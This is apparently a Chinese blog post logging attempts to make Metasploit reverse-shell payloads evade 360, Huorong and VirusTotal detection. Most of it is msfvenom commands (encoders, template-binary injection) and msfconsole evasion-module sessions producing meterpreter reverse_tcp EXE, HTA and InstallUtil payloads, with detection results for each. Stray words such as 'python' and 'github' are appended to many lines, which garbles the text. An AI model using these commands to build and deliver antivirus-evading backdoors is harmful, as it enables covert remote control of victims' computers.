最近这几天不知道为何被远控免杀给迷住了,缘由都是由于这个https://github.com/TideSec/BypassAntiVirus
虽然上面记录的,在如今不少都不怎么免杀了,本身仍是决定学习其中的一些方法。前面的一些免杀工具只是部分使用,感受大部分工具都是跟msfvenom扯不开关系的,而使用的工具中以为免杀不行的,也不想记录。主要是360全家桶和火绒做主要查杀工具,VT做为参考。python
(msfvenom的参数就不说了)git
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -f exe -o ./payload1.exe
VT:58/72;火绒和360秒杀。github
编码器为x86/shikata_ga_nai:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o ./payload2.exe
VT:57/72;火绒和360秒杀shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -x 11.exe -f exe -o ./payload3.exe(其中的11.exe是一个正常的、无后门的exe文件,我本身用python写的小工具.exe文件)
VT:11/72
火绒和360秒杀windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -e x86/shikata_ga_nai -x 11.exe -i 5 f exe -o ./payload4.exe(这种方式有问题,生成的payload很容易没法运行)app
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.111.128 LPORT=4444 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x 360sd.exe -f exe -o payload5.exe
(仅做参考,msfvenom生成失败,就没管了)dom
show evasion可查看其下的模块。tcp
msf5 > use windows/windows_defender_exe [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5 evasion(windows/windows_defender_exe) > show options Module options (evasion/windows/windows_defender_exe): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME ukup.exe yes Filename for the evasive file (default: random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.111.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Evasion target: Id Name -- ---- 0 Microsoft Windows msf5 evasion(windows/windows_defender_exe) > set filename payload.exe filename => payload.exe msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 evasion(windows/windows_defender_exe) > run [*] Compiled executable size: 4096 [+] payload.exe stored at /root/.msf4/local/payload.exe
静态360直接给秒杀了,火绒就不用试了。(火绒np)ide
msf5 evasion(windows/windows_defender_exe) > use windows/windows_defender_js_hta [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf5 evasion(windows/windows_defender_js_hta) > show options Module options (evasion/windows/windows_defender_js_hta): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME WfvPutTKt.hta yes Filename for the evasive file (default: random) Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.111.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Evasion target: Id Name -- ---- 0 Microsoft Windows msf5 evasion(windows/windows_defender_js_hta) > set filename payload.hta filename => payload.hta msf5 evasion(windows/windows_defender_js_hta) > run [+] payload.hta stored at /root/.msf4/local/payload.hta msf5 evasion(windows/windows_defender_js_hta) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 evasion(windows/windows_defender_js_hta) > set filename payload1.hta filename => payload1.hta msf5 evasion(windows/windows_defender_js_hta) > run [+] payload1.hta stored at /root/.msf4/local/payload1.hta
360全家桶和火绒都没报毒。(虽然没报毒,可是在运行的时候会生成一个新的程序来返回shell,但新程序过不了火绒和360,也就是过不了行为检测)
payload的VT:23/59;payload1的VT:23/58工具
msf5 evasion(windows/windows_defender_js_hta) > use windows/applocker_evasion_install_util [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5 evasion(windows/applocker_evasion_install_util) > msf5 evasion(windows/applocker_evasion_install_util) > show options Module options (evasion/windows/applocker_evasion_install_util): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME install_util.txt yes Filename for the evasive file (default: install_util.txt) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.111.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Evasion target: Id Name -- ---- 0 Microsoft Windows msf5 evasion(windows/applocker_evasion_install_util) > set filename payload.txt filename => payload.txt msf5 evasion(windows/applocker_evasion_install_util) > show options Module options (evasion/windows/applocker_evasion_install_util): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME payload.txt yes Filename for the evasive file (default: install_util.txt) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.111.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Evasion target: Id Name -- ---- 0 Microsoft Windows msf5 evasion(windows/applocker_evasion_install_util) > run [+] payload.txt stored at /root/.msf4/local/payload.txt [*] Copy payload.txt to the target [*] Compile using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\csc.exe /out:payload.exe payload.txt [*] Execute using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe
360和火绒静态都过,可是行为查杀熄火。